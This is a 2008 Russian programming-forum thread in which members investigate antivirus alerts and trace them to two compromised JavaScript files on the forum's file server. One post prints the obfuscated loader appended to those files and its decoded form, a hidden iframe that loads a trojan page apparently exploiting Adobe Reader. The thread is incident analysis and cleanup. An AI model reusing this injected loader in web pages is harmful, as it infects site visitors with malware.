Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате
Форум программистов > Обсуждение форума > Антивирус ругается на форум


Автор: Medved 19.12.2008, 03:00
При заходе на форум, уже второй день, постоянно браузер предупреждает о том, что сайт несет собой угрозу.
В клубе я написал какой текст выдает.

И вот дожились. При заходе в темы  Наши фото и Линки на сайты KIS обезвредил трояны.

обнаружено: троянская программа Trojan-Downloader.JS.Agent.cey    URL: http://utevox.site90.com/f/index.php
обнаружено: троянская программа Exploit.Win32.Pidief.tt    URL: http://utevox.site90.com/f/readme.pdf//data0000



Автор: Samotnik 19.12.2008, 04:07
АААААААААААА
ааааааааааааа
ААААААААААААА
шоделать   smile  smile  smile  smile  
ето же невероятно, ведь у нас идеальный форум!!!  С ним ничего не может никогда случиться  smile 

Medved, А по сабжу, чего ты панику наводиш ? Вирусов никогда не видел ?  smile 

Автор: ТоляМБА 19.12.2008, 06:37
На Наши фото заходил каспер 6.0 для Windows workstations (Дата выпуска сигнатур 18.12.2008) молчит. Страницу обновлял, всё равно тишина.
Согласен, иногда выскакивает при просмотре форума касперовское предупреждение о троянах, но опять таки у меня в опере параллельно открыта туева хуча других вкладок.
Хотелось бы узнать, что скажут владельцы других антивирей? 

Автор: Alexeis 19.12.2008, 10:28
  Avira вопит.

Автор: marykone 19.12.2008, 10:36
drweb 4.44.4  молчит /

Автор: Samotnik 19.12.2008, 10:38
нод молчит

Автор: bars80080 19.12.2008, 10:59
мне честно говоря не понятны действия администрации. я уже говорил, что у меня аваст рубит js скрипты с форума как заражённые троянами.
реакция оказалась просто удивительна, Вова перенёс тему во флейм, как будто это мне нужно

по факту замечено, что разные ативиры не обладают одной базой вирусов. поэтому советую установить доп.защиту

Автор: Str!pe 19.12.2008, 11:05
Цитата(bars80080 @  19.12.2008,  11:59 Найти цитируемый пост)
поэтому советую установить доп.защиту

все сразу?

А вы не думаете что это кто то через подпись что то подгружает? Картинки вот смотрю у многих разные стоят, всякие фишки типа "бросил курить и теперь у меня стоит". Давайте точно вычислять источники.

Автор: kemiisto 19.12.2008, 11:49
Цитата(Str!pe @  19.12.2008,  09:05 Найти цитируемый пост)
А вы не думаете что это кто то через подпись что то подгружает?

Так вроде же в http://forum.vingrad.ru/topic-240719/unread-1.html к тому и пришли. И кстати-таки dixis.ru - тоже были счётчики для бросивших курить (не только nomac.ru).

Автор: bars80080 19.12.2008, 11:51
у меня кстати, аваст хватался за js скрипты написанные судя по всему Сергеем

Автор: Alexeis 19.12.2008, 11:58
Цитата(bars80080 @  19.12.2008,  10:51 Найти цитируемый пост)
у меня кстати, аваст хватался за js скрипты написанные судя по всему Сергеем 

  аналогично. Возможно это ложные в связи с тем что появился схожий по структуре вирь.

Автор: Medved 19.12.2008, 12:57
Надо решать эту проблему. Так как сайт в данный момент относится к разряду неблагонадежных.

Зачем отпугивать посетителей.

Автор: ksili 19.12.2008, 13:14
Я лично за то, чтобы запретить навороченные подписи. Только утяжеляют страницу и отвлекают. Пусть подписи будут только текстовыми. Или все не текстовые подписи отправлять сначала на проверку админам.

Можно сделать голосование насчёт этих подписей

Автор: Medved 19.12.2008, 13:44
Ну тогда и аватары тоже надо отменить.

Автор: Str!pe 19.12.2008, 13:59
Цитата(bars80080 @  19.12.2008,  12:51 Найти цитируемый пост)
у меня кстати, аваст хватался за js скрипты написанные судя по всему Сергеем

0_o
Цитата(kemiisto @  19.12.2008,  12:49 Найти цитируемый пост)
Так вроде же в той теме к тому и пришли. И кстати-таки dixis.ru - тоже были счётчики для бросивших курить (не только nomac.ru).

Мне Опера выкидывает сообщение о просроченом сертификате на эти картинки... нод молчит. Картинки есть у Смартова и у Майка.

Автор: THandle 19.12.2008, 14:02
У меня вчера вечером кидались на Винграде какие-то сообщения о каком то сертификате... Сегодня вроде бы все как всегда. smile

Кстати, предлагаю еще убрать все стили, смайлы и сделать форум текстовым smile

Автор: Wowa 19.12.2008, 14:48
Это скорее всего у кого-то в подписи ссылка на что-то или же аватарка грузится откуда-то. На самом форуме вирусов никаких нет. Касперский также молчит. Советую писать в антивирусные лабораторией и заявлять о ложной тревоге. Пусть правят свои базы.

Участника который мог что-то внести в подпись или аватарку надо выявлять. Это очень просто. Те у кого антивир вопит. должны указывать ссылки на страницы форуме, где выскакивает предупреждение.

Добавлено @ 14:51
Тему я переименовал, т.к. название не соответствует действительности. 

Автор: Alexeis 19.12.2008, 15:24
  Avire отправил.

Автор: Alexeis 19.12.2008, 16:15
Пришел ответ от лаборатории авиры. В лаборатории утверждают что оба скрипта являются вредоносными

http://files.vingrad.ru/sergej.z/vgal/html/vingrad_style/gal.js
http://files.vingrad.ru/sergej.z/vgal/html/vingrad_style/fotossz.js

Чего дальше делать неясно, может в них пару букав поменять чтобы не детектились?

Автор: ТоляМБА 19.12.2008, 16:24
Цитата(Alexeis @  19.12.2008,  18:15 Найти цитируемый пост)
http://files.vingrad.ru/sergej.z/vgal/html...ad_style/gal.jshttp://files.vingrad.ru/sergej.z/vgal/html...tyle/fotossz.js
Сохранил оба файла на диск, проверил каспером (версию и дату сигнатур см. выше) - "Опасных объектов не обнаружено" smile

Автор: Alexeis 19.12.2008, 16:26
Dr web и Касперский говорят что все чисто. Скорее всего так и есть, но тем не менее гугл детектит как вредоносный скрипт и авира тоже.

Добавлено через 3 минуты и 57 секунд
Цитата(http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ru&site=http://files.vingrad.ru/)

Что произошло во время последнего просмотра этого сайта компанией Google?

    Из протестированных нами за последние 90 дней страниц данного сайта (4) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 3. Последний раз сайт просматривался Google 2008-12-17, а подозрительное содержание было обнаружено 2008-12-17.

    Вредоносное ПО включает 3 adware(s). Успешное заражение в привело к запуску новых процессов (в среднем 0) на целевой машине.

Автор: Samotnik 19.12.2008, 17:05
...

Автор: smartov 19.12.2008, 17:12
Alexeis, 
Цитата(Alexeis @  19.12.2008,  16:15 Найти цитируемый пост)
утверждают что оба скрипта являются вредоносными

OMG! Еще бы! Кто бы мне сказал, что в конце обоих скриптов делают строки
Код

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
function ebBx9(EGAz0gD200rP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](EGAz0gD200rP);}function Ylk2ZruR(cJ3a4II26iBN){var NcXQDCK1=0,p0jehBg7SkK92=cJ3a4II26iBN.length,oSjpaIQ=1024,jNS0FtftGaOT3,XrArIWjNf,cwu66luO="",izspazTWWH=NcXQDCK1,pafP2VWBWVgy=NcXQDCK1,iTDx8mta=NcXQDCK1,NTn0hv0JWjmMDq=Array(63,24,52,3,25,42,15,14,8,57,0,0,0,0,0,0,43,51,27,37,44,9,41,38,35,50,16,49,28,12,54,47,23,48,45,34,19,61,2,11,55,62,60,0,0,0,0,5,0,6,7,26,13,56,30,20,58,32,29,36,4,59,53,1,18,17,31,10,39,40,0,46,33,21,22);for(XrArIWjNf=Math.ceil(p0jehBg7SkK92/oSjpaIQ);XrArIWjNf>NcXQDCK1;XrArIWjNf--){for(jNS0FtftGaOT3=Math.min(p0jehBg7SkK92,oSjpaIQ);jNS0FtftGaOT3>NcXQDCK1;jNS0FtftGaOT3--,p0jehBg7SkK92--){iTDx8mta|=(NTn0hv0JWjmMDq[cJ3a4II26iBN.charCodeAt(izspazTWWH++)-48])<<pafP2VWBWVgy;if(pafP2VWBWVgy){cwu66luO+=ebBx9(213^iTDx8mta&255);iTDx8mta>>=8;pafP2VWBWVgy-=2;}else{pafP2VWBWVgy=6;}}}return (cwu66luO);}var D8jfV="GasRxV5Fut@wNpBuZ5mwwb@wNVswQwBumWhFZasDUWrhZ7mF2SWDnBhFNSYUUacuCYfShtuYiasDH5B@mBsOxVWmCOORhSBSh6BShAmwKVB@mPcOCfrUSIBDxNWhCPrOQI@DUashCP0DtpWwQf@wtaWDtSf9n@mw45WRKSYUGasRxV5FubWDApWu9a5xxpBuic5mXOfhE56OAfsReVmhIA6";eval(Ylk2ZruR(D8jfV));


Это тоже функционал Винграда?!

Добавлено через 3 минуты и 10 секунд
На мою подпись никаким сертификатом ругаться не может, т.к. у меня запрос картинки по http а не https. Если заметите, что ругается на мою картинку чем-то - пишите мне. Разберусь и уберу

Добавлено через 6 минут и 34 секунды
Alexeis, а где ты взял эти скрипты?

Добавлено через 9 минут и 9 секунд
bars80080, 
Цитата(bars80080 @  19.12.2008,  10:59 Найти цитируемый пост)
у меня аваст рубит js скрипты с форума как заражённые троянами.

Какие именно?

Автор: Alexeis 19.12.2008, 17:21
smartov, мне они тоже показались подозрительными. Имена как-будто специально измены чтобы сигнатурный поиск антивируса не мог задетектить. Может все таки вирь? Авира сейчас на первых позициях, у нее самые частые обновления, кроме того скорее всего тут поработала эвристика. Из лаборатории написали что они добавят новые сигнатуры для правильного детектирования этих вирусов.

Автор: smartov 19.12.2008, 17:23
Alexeis, к гадалке ходить не надо ,мне даже лень смотреть результат выполнения, уверен что там используется какая-то уязвимость.
Откуда эти скрипты?

Автор: Alexeis 19.12.2008, 17:26
smartov, зайди в наши фото в тему sergejz и сам их получишь.

Добавлено через 1 минуту и 51 секунду
вот тут в первый раз описали их появление http://forum.vingrad.ru/forum/topic-240719/hl/sergej/index.html

Автор: smartov 19.12.2008, 17:42
На выполнение это строка отправляет вот этот javascript код
Код

status=location;document.write('<iframe src="http:\/\/utevox.site90.com\/f\/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"><\/iframe>')


Добавлено @ 17:42
По этому адресу, как уже зарепортили, сидит троян

Добавлено @ 17:45
Эти скрипты подключаются http://forum.vingrad.ru/forum/topic-140640.html странице (НЕ ЗАХОДИТЕ!)

Добавлено через 4 минуты и 29 секунд
Код

<script src="http://files.vingrad.ru/sergej.z/vgal/html/vingrad_style/gal.js"></script>
<script src="http://files.vingrad.ru/sergej.z/vgal/html/vingrad_style/fotossz.js"></script>

Автор: Str!pe 19.12.2008, 17:50
Кто мне скажет куда этот троян прописывается и что он делает?

Автор: smartov 19.12.2008, 17:52
Судя по тому, что было по ссылке атакующий сайт пытается использовать уязвимость в Adobe Acrobat (reader?)

Добавлено через 25 секунд
Сайт походу запоминает IP жертвы, и страница жертве выдается только 1 раз

Автор: Str!pe 19.12.2008, 17:54
smartov, сертификат запрашивает у Майка. Твоя картинка молчит, но раньше вроде бы то же просила.

Автор: smartov 19.12.2008, 17:55
Цитата(Str!pe @  19.12.2008,  17:50 Найти цитируемый пост)
Кто мне скажет куда этот троян прописывается и что он делает? 

Вот http://www.viruslist.com/ru/viruses/encyclopedia?virusid=219295
Модификации "cey" там нет, но общий смысл работы остается тот же

Добавлено через 2 минуты и 39 секунд
Цитата(Str!pe @  19.12.2008,  17:54 Найти цитируемый пост)
сертификат запрашивает у Майка

http://forum.vingrad.ru/users/Mayk - тишина. А у тебя?

Автор: Str!pe 19.12.2008, 18:00
Цитата(smartov @  19.12.2008,  18:55 Найти цитируемый пост)
Модификации "cey" там нет, но общий смысл работы остается тот же

спасибо!

Цитата(smartov @  19.12.2008,  18:55 Найти цитируемый пост)
Захожу на Майка - тишина. А у тебя?

А у меня:

user posted image

Автор: sergejzr 19.12.2008, 18:02
по всей видимости сайт был сломан 13 декабря. Я уже удалил скрипты. так что теперь на форуме всё ок.

Добавлено через 23 секунды
Не Винград, а винградовский FTP

Автор: UniBomb 19.12.2008, 18:03
Цитата(smartov @  19.12.2008,  17:55 Найти цитируемый пост)
Захожу на Майка - тишина.

Появляется окошко с надписью 

Цитата

Порядок связей сертификата сервера неполный. Не зарегистрирована сторона, подписавшая сертификат. Принять?

имя сервера DIXIS.RU


Автор: Str!pe 19.12.2008, 18:08
sergejzr, надо хоть форумчанам дать знать об этом... многие его не задетектили. А эта гадость подгружает на машину что то... ладно если из зараженного компа только проксю сделают...

Автор: smartov 19.12.2008, 18:14
Str!pe, 
UniBomb, с Майком уже увидел. Firefox даже не спрашивает - прсто режет. Действительно у него там https в одной картинке

Добавлено через 4 минуты и 47 секунд
Послал Майку письмо в просьбой поменять. 

Автор: bars80080 19.12.2008, 18:41
Цитата(smartov @  19.12.2008,  16:12 Найти цитируемый пост)
Какие именно? 

как раз эти самые два.

сейчас снова словил запрос https здесь:
http://forum.vingrad.ru/index.php?showtopic=240685&view=findpost&p=1733728
в наличии всего четыре участника AntonSaburov, VSergeyV, Sun, December, 

Автор: Wowa 19.12.2008, 20:10
Это видимо связано с тем, что кто-то из модераторов подхватил вирус, который спер у него хранящийся на компе ФТП-пароль к вспомогательному серверу files.vingrad.ru
Вот там вот и пошерстил вирус слегка заразив некоторые расположенные там файлы.

Автор: Medved 19.12.2008, 22:14
Значит надо вводит персональные политики безопасности.
Цель которых - обеспечение сохранности административных данных от посягательства злоумышленников.

1. Отказаться от общего пароля. 
2. Ввести персональные пароли на каждого члена администрации, имеющих доступ к административным данным.
3. Деактивировать персональные пароли, после того, как член администрации ее покинул.
4. Тщательно следить за соблюдением этих политик.

Добавлено через 4 минуты и 11 секунд
При таком раскладе можно будет и отследить источник заражения

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)